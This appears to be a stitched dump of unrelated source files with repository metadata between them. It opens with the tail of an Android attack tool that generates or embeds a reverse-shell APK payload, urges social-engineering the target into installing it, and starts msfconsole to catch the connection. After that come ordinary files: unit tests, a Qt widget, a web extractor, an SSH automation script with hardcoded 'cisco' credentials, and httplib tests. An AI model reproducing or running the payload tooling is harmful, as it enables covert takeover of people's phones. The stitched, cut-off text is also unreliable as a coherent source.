print("[\033[31m:✗:\033[0m]\033[31mNo path was provided.\033[0m\n[\033[34m:+:\033[0m]\033[32mSelecting the present directory to output it.\033[0m")
sentence2 = (f'\n\033[32mGenerating embeded payload "{payloadName}" at {payloadPath}\033[0m\n')
animateWord(sentence2)
print()
createEmbededPayload(filePath, IP, Port, payloadPath + "/" + payloadName)
elif embed == "no" or embed == "No" or embed == "NO" or embed == "n" or embed == "N":
embeded = False
Path = input("[\033[34m:+:\033[0m]\033[32mEnter the full path to output the payload (\033[04m\033[01mor just 'name.apk'\033[0m\033[32m):\033[0m ").rstrip("/")
if ".apk" in Path:
pass
else:
check = os.path.exists(Path)
if check == True:
pass
else:
print("[\033[31m:✗:\033[0m]\033[31mPath does not exists.\033[0m")
exit()
namedPayload = False
if ".apk" in Path:
namedPayload = True
for char in Path:
if char == "/":
namedPayload = False
sentence3 = (f'\n\033[32mGenerating payload with love only for you...\033[0m\n')
animateWord(sentence3)
print()
createPayload(IP, Port, Path)
if namedPayload == True:
print(f"[\033[34m:+:\033[0m]\033[32mPayload saved at {os.getcwd()}/{Path}\033[0m\n")
else:
namedPayload == False
print(f"[\033[34m:+:\033[0m]\033[32mPayload saved at {Path}\033[0m\n")
else:
payloadYn = input("[\033[34m:+:\033[0m]\033[32mWant to rename the .apk file(yes/N):\033[0m ").strip()
if payloadYn == "yes" or payloadYn == "Yes" or payloadYn == "YES" or payloadYn == "y" or payloadYn == "Y":
name = input("[\033[34m:+:\033[0m]\033[32mEnter the name(\033[01m\033[04meg: name.apk\033[0m\033[32m):\033[0m ")
sentence4 = (f'\n\033[32mGenerating payload having name "{name}" with love only for you...\033[0m\n')
animateWord(sentence4)
print()
createPayload(IP, Port, Path + "/" + name)
print(f"[\033[34m:+:\033[0m]\033[32mPayload saved at {Path}/{name}\033[0m\n")
elif payloadYn == "no" or payloadYn == "No" or payloadYn == "NO" or payloadYn == "n" or payloadYn == "N":
sentence5 = (f'\n\033[32mGenerating payload having name "payload.apk" with love only for you...\033[0m\n')
animateWord(sentence5)
print()
createPayload(IP, Port, Path + "/payload.apk")
print(f"[\033[34m:+:\033[0m]\033[32mPayload saved at {Path}/payload.apk\033[0m\n")
else:
print("[\033[31m:✗:\033[0m]\033[31mNot a valid option.\033[0m")
exit()
else:
print("[\033[31m:✗:\033[0m]\033[31mNot a valid option.\033[0m")
exit()
print("\n\033[31mNOTE\033[0m: \033[04m\033[32mThis payload will be easily detected by the system's security.\033[0m")
print("\033[32mAnd it's upto you how you make the target install this payload on his/her Android OS.\033[0m")
print("\033[32mTIP from the author: Hack the most vulnerable OS the HumanOS to make it done.\033[0m\n")
print("\033[32mAfter this job press Enter to continue...\033[0m")
input()
if WAN == True:
ip = "0.0.0.0"
port = 1234
autoExploit(ip, port)
subprocess.call("msfconsole --resource commands.txt", shell=True)
elif WAN == False:
autoExploit(IP, Port)
subprocess.call("msfconsole --resource commands.txt", shell=True) | 43.327434 | 253 | 0.616932 |
9dfbb70b4c93cf57692ba576151a6d1a4e01010a | 5,054 | py | Python | tests/test_filesmodel.py | MarainInc/tmip-emat | 700514342cf263b484a4f42ac783100159dcddb2 | [
"BSD-3-Clause"
] | null | null | null | tests/test_filesmodel.py | MarainInc/tmip-emat | 700514342cf263b484a4f42ac783100159dcddb2 | [
"BSD-3-Clause"
] | null | null | null | tests/test_filesmodel.py | MarainInc/tmip-emat | 700514342cf263b484a4f42ac783100159dcddb2 | [
"BSD-3-Clause"
] | 1 | 2020-08-06T07:36:21.000Z | 2020-08-06T07:36:21.000Z |
import unittest
import os
from pytest import approx
import pandas as pd
import numpy as np
import emat
from emat.scope.scope import Scope
from emat.database.sqlite.sqlite_db import SQLiteDB
class TestCoreFilesMethods(unittest.TestCase):
def test_getters(self):
from emat.model.core_files.parsers import loc, loc_mean, loc_sum
from emat.model.core_files.parsers import iloc, iloc_mean, iloc_sum
zz = pd.DataFrame(
np.arange(50).reshape(5, 10),
index=[f'row{i}' for i in range(1, 6)],
columns=[f'col{i}' for i in range(1, 11)],
)
a = loc['row2','col8']
assert repr(a) == "loc['row2','col8']"
h = iloc[3,3]
assert repr(h) == 'iloc[3,3]'
i = iloc_mean[:2,7:]
assert repr(i) == 'iloc_mean[:2,7:]'
k = iloc_sum[2,:]
assert repr(k) == 'iloc_sum[2,:]'
j = h + k
assert repr(j) == 'iloc[3,3]+iloc_sum[2,:]'
assert a(zz) == 17
assert h(zz) == 33
assert i(zz) == approx(13)
assert k(zz) == 245
assert j(zz) == 278
def test_load_archived_gbnrtc(self):
import emat.examples
s, db, m = emat.examples.gbnrtc()
m.archive_path = emat.examples.package_file("examples", "gbnrtc", "archive")
assert os.path.exists(m.get_experiment_archive_path(1))
measures = m.load_archived_measures(1)
correct_1 = {
'Peak Walk-to-transit Boarding': 34281.205786,
'Off-Peak Walk-to-transit Boarding': 32321.752577999996,
'Peak Drive-to-transit Boarding': 4650.044377,
'Off-Peak Drive-to-transit Boarding': 3896.5493810000003,
'Total Transit Boardings': 75149.55212200001,
'Peak Walk-to-transit LRT Boarding': 9008.224461,
'Off-Peak Walk-to-transit LRT Boarding': 10645.432359,
'Peak Drive-to-transit LRT Boarding': 2761.200268,
'Off-Peak Drive-to-transit LRT Boarding': 2406.542344,
'Total LRT Boardings': 24821.399432,
'Region-wide VMT': 25113613.736528996,
'Total Auto VMT': 22511322.163062,
'Total Truck VMT': 2602291.573469,
'Interstate + Expressway + Ramp/Connector VMT': 10305109.628398,
'Major and Minor Arterials VMT': 10475969.845537,
'AM Trip Time (minutes)': 14.654542999999999,
'AM Trip Length (miles)': 7.548014,
'PM Trip Time (minutes)': 15.324133999999999,
'PM Trip Length (miles)': 8.261152000000001,
'Peak Transit Share': 0.014477,
'Peak NonMotorized Share': 0.060296,
'Off-Peak Transit Share': 0.011423,
'Off-Peak NonMotorized Share': 0.056386,
'Daily Transit Share': 0.012819999999999998,
'Daily NonMotorized Share': 0.058175, 'Households within 30 min of CBD': 399597,
'Number of Home-based work tours taking <= 45 minutes via transit': 340958.875,
'Downtown to Airport Travel Time': 14.443295999999998,
'OD Volume District 1 to 1': 2,
'OD Volume District 1 to 2': 27850.572266000003,
'OD Volume District 1 to 3': 93799.382813,
'OD Volume District 1 to 4': 23470.341797,
'OD Volume District 1 to 5': 20363.416016,
'OD Volume District 1 to 6': 2140.624268,
'OD Volume District 1 to 7': 21603.265625,
'OD Volume District 1 to 8': 1890.3181149999998,
'OD Volume District 1 to 9': 10427.630859,
'OD Volume District 1 to 10': 4448.775879,
'Kensington Daily VMT': 206937.015614,
'Kensington Daily VHT': 239242.35552800001,
'Kensington_OB PM VMT': 26562.351204,
'Kensington_OB PM VHT': 31363.340938,
'Kensington_IB AM VMT': 23796.174231999998,
'Kensington_IB AM VHT': 30434.206062999998,
'190 Daily VMT': 282469.874037,
'190 Daily VHT': 300633.50829,
'190_OB Daily VMT': 36483.463967,
'190_OB Daily VHT': 45783.789093,
'190_IB Daily VMT': 30282.776539,
'190_IB Daily VHT': 33375.415786000005,
'33_west Daily VMT': 45402.79583,
'33_west Daily VHT': 57478.416767999995,
'I90_south Daily VMT': 147224.53766099998,
'I90_south Daily VHT': 153543.832728,
}
assert set(correct_1.keys()).issubset(measures.keys())
assert {k: measures[k] for k in correct_1.keys()} == approx(correct_1)
def test_files_with_broken_scope():
try:
import core_files_demo
except:
import pytest
pytest.skip("core_files_demo not installed")
fx = core_files_demo.RoadTestFileModel(
scope_file=emat.package_file('model', 'tests', 'road_test_corrupt2.yaml')
)
design = fx.design_experiments(n_samples=2)
result = fx.run_experiments(design)
assert result['bogus_measure'].isna().all()
if __name__ == '__main__':
unittest.main()
| 39.484375 | 92 | 0.600317 |
13b4413031a0f88e3ab61376515afe8132c830d0 | 3,279 | py | Python | libraries/base/qtWidgets/shuffleBox.py | PiRSquared17/r-orange | 6bc383f1db3c10c59e16b39daffc44df904ce031 | [
"Apache-2.0"
] | 1 | 2019-04-15T13:50:30.000Z | 2019-04-15T13:50:30.000Z | libraries/base/qtWidgets/shuffleBox.py | PiRSquared17/r-orange | 6bc383f1db3c10c59e16b39daffc44df904ce031 | [
"Apache-2.0"
] | null | null | null | libraries/base/qtWidgets/shuffleBox.py | PiRSquared17/r-orange | 6bc383f1db3c10c59e16b39daffc44df904ce031 | [
"Apache-2.0"
] | 1 | 2016-01-21T23:00:21.000Z | 2016-01-21T23:00:21.000Z | """Shuffle Box
This is a Red-R specific widget. The shuffleBox inherits from the listBox with the added ability that the order of items can be changed using the drag/drop feature (so they are shuffled). This is useful for setting the order in which items appear.
"""
from redRGUI import widgetState
from libraries.base.qtWidgets.listBox import listBox
import redRReports,redRLog
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from OrderedDict import OrderedDict
import redRi18n
_ = redRi18n.get_(package = 'base')
class shuffleBox(listBox):
def __init__(self, *args, **kwargs):
listBox.__init__(self, enableDragDrop = True, *args, **kwargs)
def dropEvent(self, ev):
if not self.enableDragDrop: return
if ev.mimeData().hasText():
item = self.itemAt(ev.pos())
if item:
index = self.indexFromItem(item).row()
else:
index = self.count()
source = ev.mimeData().source
selectedItemIndices = eval(unicode(ev.mimeData().text()))
if self.ogLabels != None and self.ogValue != None:
allSourceItems = getdeepattr(source.widget, source.ogLabels, default = [])
selectedItems = [allSourceItems[i] for i in selectedItemIndices]
allDestItems = getdeepattr(self.widget, self.ogLabels, default = [])
items = [item for item in allSourceItems if item not in selectedItems]
if index < len(allDestItems):
while index > 0 and index in getdeepattr(self.widget, self.ogValue, default = []): # if we are dropping items on a selected item, we have to select some previous unselected item as the drop target
index -= 1
destItem = allDestItems[index]
index = items.index(destItem)
else:
index = max(0, index - len(selectedItems))
setattr(self.widget, self.ogLabels, items[:index] + selectedItems + items[index:])
setattr(self.widget, self.ogValue, range(index, index+len(selectedItems)))
else: # if we don't have variables ogValue and ogLabel
if index < self.count():
while index > 0 and self.item(index).isSelected(): # if we are dropping items on a selected item, we have to select some previous unselected item as the drop target
index -= 1
items = [source.item(i) for i in selectedItemIndices]
for ind in selectedItemIndices[::-1]:
source.takeItem(ind)
if ind <= index: index-= 1
for item in items[::-1]:
self.insertItem(index, item)
self.clearSelection()
for i in range(index, index+len(items)):
self.item(i).setSelected(1)
if self.dragDopCallback: # call the callback
self.dragDopCallback()
ev.setDropAction(Qt.MoveAction)
ev.accept()
## whatever all of this does we need to execute the function to update the items
self.updateRedRItems()
else:
ev.ignore() | 49.681818 | 249 | 0.589814 |
e8097d5ea97775f66b4fa15a066f0b427f076e7d | 300 | py | Python | src/colusa/plugins/etr_techtarget.py | huuhoa/symphony | f8a364649634b4d864771b2c8a3103b714b6b9e2 | [
"MIT"
] | 6 | 2020-08-29T04:14:15.000Z | 2020-09-18T10:53:59.000Z | src/colusa/plugins/etr_techtarget.py | huuhoa/colusa | 07a0a60680c8085c5dca522e0237f7b5a5181dcb | [
"MIT"
] | 34 | 2021-09-07T15:17:38.000Z | 2022-03-25T15:16:40.000Z | src/colusa/plugins/etr_techtarget.py | huuhoa/colusa | 07a0a60680c8085c5dca522e0237f7b5a5181dcb | [
"MIT"
] | 2 | 2020-08-29T04:21:35.000Z | 2020-09-13T17:36:06.000Z | from colusa.etr import Extractor, register_extractor
@register_extractor('.techtarget.com/')
class TechTargetExtractor(Extractor):
def _find_main_content(self):
return self.bs.find('section', id='content-body')
def cleanup(self):
super(TechTargetExtractor, self).cleanup()
| 27.272727 | 57 | 0.733333 |
6ae3b1c132f7ff1220ac0d9c69c65cdfb99db7a8 | 5,150 | py | Python | Old/AutoShell0.2.py | frankie336/AutoShell | 3aef9fff7dfdcb10e8e8741585fd0331797358e8 | [
"MIT"
] | null | null | null | Old/AutoShell0.2.py | frankie336/AutoShell | 3aef9fff7dfdcb10e8e8741585fd0331797358e8 | [
"MIT"
] | null | null | null | Old/AutoShell0.2.py | frankie336/AutoShell | 3aef9fff7dfdcb10e8e8741585fd0331797358e8 | [
"MIT"
] | null | null | null | """
Created on Mon Jan 11 20:08:27 2021
#! Python 3.8
@author: Francis Neequaye
francis.neequaye@gmail.com
"""
"""
Script Instructions
_____
1.Enter the remote IP's addresses of
Cisco (or other) devices on each search
of the Hosts.dat file
2. Enter input commands on each line of
the Commands.dat file
"""
import paramiko
import time
from multiprocessing.pool import ThreadPool
import re
import datetime
import psutil
import logging
start = time.time()
class AutoShellInterface:
def LoadDataToList(self, path: str, file_name: str) -> str:
"""Load in files as lists."""
pass
def SaveDataFromList(self, path: str, file_name: str) -> str:
"""Save list elements as files"""
pass
class ShellWork(AutoShellInterface):
count_cores = psutil.cpu_count(logical=True)#Count number of cores/threads in CPU
def __init__(self):
self.date_time = datetime.datetime.now().strftime("%Y-%m-%d")
self.username = username
self.password = password
def LoadDataToList(self, path: str, file_name: str) -> str:
"""Overrides AutoShellInterface.SaveDataFromList()"""
with open(path+file_name) as f:
lines = f.read().splitlines()
lines = [string for string in lines if string != ""]#Remove possible empty lines
return lines
def SaveDataFromList(self, path: str, file_name: str,
list_name: str) -> str:
"""Overrides AutoShellInterface.LoadDataToList()"""
with open(path+str(self.date_time)+'_'+file_name+'.txt', "w") as f:
f.writelines(list_name)
def SetUpCommands(self):
commands = self.LoadDataToList(path='SetUp\\',file_name='Commands.dat')
return commands
def TeminalZero(self):
device = 'Cisco'
term_zero_list = ['terminal length 0\n']
if device == 'Cisco':
terminal_length = term_zero_list[0]
return terminal_length
def Connect(self,host_ip):
terminal_length = self.TeminalZero()
commands = self.SetUpCommands()
"""
-Attempt to connect to a remote host:
1. If the host is unreachable, print
the error and continue to the next
host
"""
try:
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(host_ip, port=22, username=self.username, password=self.password, look_for_keys=False, timeout=None)
channel = ssh.get_transport().open_session()
channel.invoke_shell()
except Exception as e:
print(host_ip,e.args)
return
channel.sendall(terminal_length)#Send terminal length zero command
time.sleep(.2)
"""
Once a connection is established:
1. send the shell input Commands
by looping the self.commands list
"""
for x in commands:
channel.sendall(x+"\n")
time.sleep(1)
self.shell_output = channel.recv(9999).decode(encoding='utf-8') #Receive buffer output
ssh.close()
return self.shell_output# Return to threads
def SaveToFile(self,files):
"""
For Cisco devices
__________________
1. Search for the hostname string
2.Strip the user mode prompt (>,#)
from the hostname string
3. Save
"""
mode_prompt_patterns = ['>','#']
look_behind_prompt = ['(.+)'+mode_prompt_patterns[0],'(.+)'+mode_prompt_patterns[1]]
hostname_pat = re.compile( '|'.join(look_behind_prompt))
to_strip = re.compile( '|'.join(mode_prompt_patterns))
for ele in files:
stripped = (re.search(to_strip, str(ele))).group(0)
hostname = (re.search(hostname_pat, str(ele))).group().strip(stripped)
self.SaveDataFromList(path='Output\\',file_name=hostname,list_name=ele)
print(hostname,'done',stripped)
def MultThreadConn(self):
"""
The multiprocessing.pool module will spawn concurrent
proceses , executing the AutoShell() module . On each
occasion, the @arg (hosts) = self.ips list will be interated.
Each thread will run for a seperate IP address from the
Hosts.dat file
"""
obj = ShellWork()
loop_hosts = self.LoadDataToList(path='SetUp\\',file_name='Hosts.dat')
THREADS = ThreadPool(obj.count_cores)#Set the number of threads
SHELL_OUT = THREADS.map(self.Connect, loop_hosts)
#print(SHELL_OUT)
self.SaveToFile(SHELL_OUT)
THREADS.close()
if __name__ == "__main__":
username = 'cisco'
password = 'cisco'
a = ShellWork()
a.MultThreadConn()
end = time.time()
print(end - start)
| 22.587719 | 132 | 0.583107 |
38c0d2db0ede8d6f2b217ce9341f97115585b0db | 17,211 | py | Python | greentest/2.7pypy/test_httplib.py | Eugeny/gevent | adb7b838ed66c13abe5059605730bb4b4531bbcd | [
"MIT"
] | 70 | 2015-08-04T09:39:43.000Z | 2021-09-04T23:28:39.000Z | greentest/2.7pypy/test_httplib.py | Eugeny/gevent | adb7b838ed66c13abe5059605730bb4b4531bbcd | [
"MIT"
] | 8 | 2016-04-28T16:05:09.000Z | 2019-04-02T07:21:23.000Z | greentest/2.7pypy/test_httplib.py | Eugeny/gevent | adb7b838ed66c13abe5059605730bb4b4531bbcd | [
"MIT"
] | 299 | 2015-01-23T10:06:24.000Z | 2022-02-02T06:34:51.000Z | import httplib
import array
import httplib
import StringIO
import socket
import errno
import unittest
TestCase = unittest.TestCase
from test import test_support
HOST = test_support.HOST
class FakeSocket:
def __init__(self, text, fileclass=StringIO.StringIO):
self.text = text
self.fileclass = fileclass
self.data = ''
def sendall(self, data):
self.data += ''.join(data)
def makefile(self, mode, bufsize=None):
if mode != 'r' and mode != 'rb':
raise httplib.UnimplementedFileMode()
return self.fileclass(self.text)
class EPipeSocket(FakeSocket):
def __init__(self, text, pipe_trigger):
# When sendall() is called with pipe_trigger, raise EPIPE.
FakeSocket.__init__(self, text)
self.pipe_trigger = pipe_trigger
def sendall(self, data):
if self.pipe_trigger in data:
raise socket.error(errno.EPIPE, "gotcha")
self.data += data
def close(self):
pass
class NoEOFStringIO(StringIO.StringIO):
"""Like StringIO, but raises AssertionError on EOF.
This is used below to test that httplib doesn't try to read
more from the underlying file than it should.
"""
def read(self, n=-1):
data = StringIO.StringIO.read(self, n)
if data == '':
raise AssertionError('caller tried to read past EOF')
return data
def readline(self, length=None):
data = StringIO.StringIO.readline(self, length)
if data == '':
raise AssertionError('caller tried to read past EOF')
return data
class HeaderTests(TestCase):
def test_auto_headers(self):
# Some headers are added automatically, but should not be added by
# .request() if they are explicitly set.
class HeaderCountingBuffer(list):
def __init__(self):
self.count = {}
def append(self, item):
kv = item.split(':')
if len(kv) > 1:
# item is a 'Key: Value' header string
lcKey = kv[0].lower()
self.count.setdefault(lcKey, 0)
self.count[lcKey] += 1
list.append(self, item)
for explicit_header in True, False:
for header in 'Content-length', 'Host', 'Accept-encoding':
conn = httplib.HTTPConnection('example.com')
conn.sock = FakeSocket('blahblahblah')
conn._buffer = HeaderCountingBuffer()
body = 'spamspamspam'
headers = {}
if explicit_header:
headers[header] = str(len(body))
conn.request('POST', '/', body, headers)
self.assertEqual(conn._buffer.count[header.lower()], 1)
def test_putheader(self):
conn = httplib.HTTPConnection('example.com')
conn.sock = FakeSocket(None)
conn.putrequest('GET','/')
conn.putheader('Content-length',42)
self.assertTrue('Content-length: 42' in conn._buffer)
def test_ipv6host_header(self):
# Default host header on IPv6 transaction should wrapped by [] if
# its actual IPv6 address
expected = 'GET /foo HTTP/1.1\r\nHost: [2001::]:81\r\n' \
'Accept-Encoding: identity\r\n\r\n'
conn = httplib.HTTPConnection('[2001::]:81')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
expected = 'GET /foo HTTP/1.1\r\nHost: [2001:102A::]\r\n' \
'Accept-Encoding: identity\r\n\r\n'
conn = httplib.HTTPConnection('[2001:102A::]')
sock = FakeSocket('')
conn.sock = sock
conn.request('GET', '/foo')
self.assertTrue(sock.data.startswith(expected))
class BasicTest(TestCase):
def test_status_lines(self):
# Test HTTP status lines
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = httplib.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(), 'Text')
self.assertTrue(resp.isclosed())
body = "HTTP/1.1 400.100 Not Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = httplib.HTTPResponse(sock)
self.assertRaises(httplib.BadStatusLine, resp.begin)
def test_bad_status_repr(self):
exc = httplib.BadStatusLine('')
self.assertEqual(repr(exc), '''BadStatusLine("\'\'",)''')
def test_partial_reads(self):
# if we have a lenght, the system knows when to close itself
# same behaviour than when we read the whole thing with read()
body = "HTTP/1.1 200 Ok\r\nContent-Length: 4\r\n\r\nText"
sock = FakeSocket(body)
resp = httplib.HTTPResponse(sock)
resp.begin()
self.assertEqual(resp.read(2), 'Te')
self.assertFalse(resp.isclosed())
self.assertEqual(resp.read(2), 'xt')
self.assertTrue(resp.isclosed())
def test_host_port(self):
# Check invalid host_port
# Note that httplib does not accept user:password@ in the host-port.
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(httplib.InvalidURL, httplib.HTTP, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000", "fe80::207:e9ff:fe9b",
8000),
("www.python.org:80", "www.python.org", 80),
("www.python.org", "www.python.org", 80),
("www.python.org:", "www.python.org", 80),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 80)):
http = httplib.HTTP(hp)
c = http._conn
if h != c.host:
self.fail("Host incorrectly parsed: %s != %s" % (h, c.host))
if p != c.port:
self.fail("Port incorrectly parsed: %s != %s" % (p, c.host))
def test_response_headers(self):
# test response with multiple message headers with the same field name.
text = ('HTTP/1.1 200 OK\r\n'
'Set-Cookie: Customer="WILE_E_COYOTE";'
' Version="1"; Path="/acme"\r\n'
'Set-Cookie: Part_Number="Rocket_Launcher_0001"; Version="1";'
' Path="/acme"\r\n'
'\r\n'
'No body\r\n')
hdr = ('Customer="WILE_E_COYOTE"; Version="1"; Path="/acme"'
', '
'Part_Number="Rocket_Launcher_0001"; Version="1"; Path="/acme"')
s = FakeSocket(text)
r = httplib.HTTPResponse(s)
r.begin()
cookies = r.getheader("Set-Cookie")
if cookies != hdr:
self.fail("multiple headers not combined properly")
def test_read_head(self):
# Test that the library doesn't attempt to read any data
# from a HEAD request. (Tickles SF bug #622042.)
sock = FakeSocket(
'HTTP/1.1 200 OK\r\n'
'Content-Length: 14432\r\n'
'\r\n',
NoEOFStringIO)
resp = httplib.HTTPResponse(sock, method="HEAD")
resp.begin()
if resp.read() != "":
self.fail("Did not expect response from HEAD request")
def test_send_file(self):
expected = 'GET /foo HTTP/1.1\r\nHost: example.com\r\n' \
'Accept-Encoding: identity\r\nContent-Length:'
body = open(__file__, 'rb')
conn = httplib.HTTPConnection('example.com')
sock = FakeSocket(body)
conn.sock = sock
conn.request('GET', '/foo', body)
self.assertTrue(sock.data.startswith(expected))
def test_send(self):
expected = 'this is a test this is only a test'
conn = httplib.HTTPConnection('example.com')
sock = FakeSocket(None)
conn.sock = sock
conn.send(expected)
self.assertEqual(expected, sock.data)
sock.data = ''
conn.send(array.array('c', expected))
self.assertEqual(expected, sock.data)
sock.data = ''
conn.send(StringIO.StringIO(expected))
self.assertEqual(expected, sock.data)
def test_chunked(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello worl\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + '0\r\n')
resp = httplib.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), 'hello world')
resp.close()
for x in ('', 'foo\r\n'):
sock = FakeSocket(chunked_start + x)
resp = httplib.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except httplib.IncompleteRead, i:
self.assertEqual(i.partial, 'hello world')
self.assertEqual(repr(i),'IncompleteRead(11 bytes read)')
self.assertEqual(str(i),'IncompleteRead(11 bytes read)')
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_chunked_head(self):
chunked_start = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
'a\r\n'
'hello world\r\n'
'1\r\n'
'd\r\n'
)
sock = FakeSocket(chunked_start + '0\r\n')
resp = httplib.HTTPResponse(sock, method="HEAD")
resp.begin()
self.assertEqual(resp.read(), '')
self.assertEqual(resp.status, 200)
self.assertEqual(resp.reason, 'OK')
self.assertTrue(resp.isclosed())
def test_negative_content_length(self):
sock = FakeSocket('HTTP/1.1 200 OK\r\n'
'Content-Length: -1\r\n\r\nHello\r\n')
resp = httplib.HTTPResponse(sock, method="GET")
resp.begin()
self.assertEqual(resp.read(), 'Hello\r\n')
resp.close()
def test_incomplete_read(self):
sock = FakeSocket('HTTP/1.1 200 OK\r\nContent-Length: 10\r\n\r\nHello\r\n')
resp = httplib.HTTPResponse(sock, method="GET")
resp.begin()
try:
resp.read()
except httplib.IncompleteRead as i:
self.assertEqual(i.partial, 'Hello\r\n')
self.assertEqual(repr(i),
"IncompleteRead(7 bytes read, 3 more expected)")
self.assertEqual(str(i),
"IncompleteRead(7 bytes read, 3 more expected)")
else:
self.fail('IncompleteRead expected')
finally:
resp.close()
def test_epipe(self):
sock = EPipeSocket(
"HTTP/1.0 401 Authorization Required\r\n"
"Content-type: text/html\r\n"
"WWW-Authenticate: Basic realm=\"example\"\r\n",
b"Content-Length")
conn = httplib.HTTPConnection("example.com")
conn.sock = sock
self.assertRaises(socket.error,
lambda: conn.request("PUT", "/url", "body"))
resp = conn.getresponse()
self.assertEqual(401, resp.status)
self.assertEqual("Basic realm=\"example\"",
resp.getheader("www-authenticate"))
def test_filenoattr(self):
# Just test the fileno attribute in the HTTPResponse Object.
body = "HTTP/1.1 200 Ok\r\n\r\nText"
sock = FakeSocket(body)
resp = httplib.HTTPResponse(sock)
self.assertTrue(hasattr(resp,'fileno'),
'HTTPResponse should expose a fileno attribute')
# Test lines overflowing the max line size (_MAXLINE in http.client)
def test_overflowing_status_line(self):
self.skipTest("disabled for HTTP 0.9 support")
body = "HTTP/1.1 200 Ok" + "k" * 65536 + "\r\n"
resp = httplib.HTTPResponse(FakeSocket(body))
self.assertRaises((httplib.LineTooLong, httplib.BadStatusLine), resp.begin)
def test_overflowing_header_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'X-Foo: bar' + 'r' * 65536 + '\r\n\r\n'
)
resp = httplib.HTTPResponse(FakeSocket(body))
self.assertRaises(httplib.LineTooLong, resp.begin)
def test_overflowing_chunked_line(self):
body = (
'HTTP/1.1 200 OK\r\n'
'Transfer-Encoding: chunked\r\n\r\n'
+ '0' * 65536 + 'a\r\n'
'hello world\r\n'
'0\r\n'
)
resp = httplib.HTTPResponse(FakeSocket(body))
resp.begin()
self.assertRaises(httplib.LineTooLong, resp.read)
class OfflineTest(TestCase):
def test_responses(self):
self.assertEqual(httplib.responses[httplib.NOT_FOUND], "Not Found")
class SourceAddressTest(TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = test_support.bind_port(self.serv)
self.source_port = test_support.find_unused_port()
self.serv.listen(5)
self.conn = None
def tearDown(self):
if self.conn:
self.conn.close()
self.conn = None
self.serv.close()
self.serv = None
def testHTTPConnectionSourceAddress(self):
self.conn = httplib.HTTPConnection(HOST, self.port,
source_address=('', self.source_port))
self.conn.connect()
self.assertEqual(self.conn.sock.getsockname()[1], self.source_port)
@unittest.skipIf(not hasattr(httplib, 'HTTPSConnection'),
'httplib.HTTPSConnection not defined')
def testHTTPSConnectionSourceAddress(self):
self.conn = httplib.HTTPSConnection(HOST, self.port,
source_address=('', self.source_port))
# We don't test anything here other the constructor not barfing as
# this code doesn't deal with setting up an active running SSL server
# for an ssl_wrapped connect() to actually return from.
class TimeoutTest(TestCase):
PORT = None
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
TimeoutTest.PORT = test_support.bind_port(self.serv)
self.serv.listen(5)
def tearDown(self):
self.serv.close()
self.serv = None
def testTimeoutAttribute(self):
'''This will prove that the timeout gets through
HTTPConnection and into the socket.
'''
# default -- use global socket timeout
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
httpConn = httplib.HTTPConnection(HOST, TimeoutTest.PORT)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
# no timeout -- do not use global socket default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
httpConn = httplib.HTTPConnection(HOST, TimeoutTest.PORT,
timeout=None)
httpConn.connect()
finally:
socket.setdefaulttimeout(None)
self.assertEqual(httpConn.sock.gettimeout(), None)
httpConn.close()
# a value
httpConn = httplib.HTTPConnection(HOST, TimeoutTest.PORT, timeout=30)
httpConn.connect()
self.assertEqual(httpConn.sock.gettimeout(), 30)
httpConn.close()
class HTTPSTimeoutTest(TestCase):
# XXX Here should be tests for HTTPS, there isn't any right now!
def test_attributes(self):
# simple test to check it's storing it
if hasattr(httplib, 'HTTPSConnection'):
h = httplib.HTTPSConnection(HOST, TimeoutTest.PORT, timeout=30)
self.assertEqual(h.timeout, 30)
@unittest.skipIf(not hasattr(httplib, 'HTTPS'), 'httplib.HTTPS not available')
def test_host_port(self):
# Check invalid host_port
# Note that httplib does not accept user:password@ in the host-port.
for hp in ("www.python.org:abc", "user:password@www.python.org"):
self.assertRaises(httplib.InvalidURL, httplib.HTTP, hp)
for hp, h, p in (("[fe80::207:e9ff:fe9b]:8000", "fe80::207:e9ff:fe9b",
8000),
("pypi.python.org:443", "pypi.python.org", 443),
("pypi.python.org", "pypi.python.org", 443),
("pypi.python.org:", "pypi.python.org", 443),
("[fe80::207:e9ff:fe9b]", "fe80::207:e9ff:fe9b", 443)):
http = httplib.HTTPS(hp)
c = http._conn
if h != c.host:
self.fail("Host incorrectly parsed: %s != %s" % (h, c.host))
if p != c.port:
self.fail("Port incorrectly parsed: %s != %s" % (p, c.host))
def test_main(verbose=None):
test_support.run_unittest(HeaderTests, OfflineTest, BasicTest, TimeoutTest,
HTTPSTimeoutTest, SourceAddressTest)
if __name__ == '__main__':
test_main()
| 36.463983 | 83 | 0.573587 |
19b8c64e356d3b03bae64110d7d302def1744ed1 | 413 | py | Python | src/args.py | mradbourne/jump-to-py | 42688123cfdf3e40330b5859d911d84d9a7601ca | [
"MIT"
] | null | null | null | src/args.py | mradbourne/jump-to-py | 42688123cfdf3e40330b5859d911d84d9a7601ca | [
"MIT"
] | null | null | null | src/args.py | mradbourne/jump-to-py | 42688123cfdf3e40330b5859d911d84d9a7601ca | [
"MIT"
] | null | null | null | import argparse
def get_args():
